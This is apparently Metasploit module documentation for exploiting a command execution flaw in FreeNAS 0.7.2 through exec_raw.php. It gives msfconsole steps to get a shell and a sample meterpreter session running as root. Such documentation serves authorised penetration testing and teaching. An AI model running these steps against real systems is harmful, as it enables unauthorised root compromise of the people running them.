32 lines
833 B
Markdown
32 lines
833 B
Markdown
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
This module exploits an arbitrary command execution flaw
|
||
|
|
in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
|
||
|
|
to the exec_raw.php page, an attacker may be able to execute arbitrary commands.
|
||
|
|
|
||
|
|
NOTE: This module works best with php/meterpreter payloads.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Install the application
|
||
|
|
2. Start msfconsole
|
||
|
|
3. Do: ```use exploit/multi/http/freenas_exec_raw```
|
||
|
|
4. Do: ```set rhost [ip]```
|
||
|
|
5. Do: ```run```
|
||
|
|
6. You should get a shell.
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Unknown
|
||
|
|
|
||
|
|
```
|
||
|
|
meterpreter > sysinfo
|
||
|
|
Computer: freenas.local
|
||
|
|
OS : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010 root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
|
||
|
|
meterpreter > getuid
|
||
|
|
Server username: root (0)
|
||
|
|
meterpreter >
|
||
|
|
```
|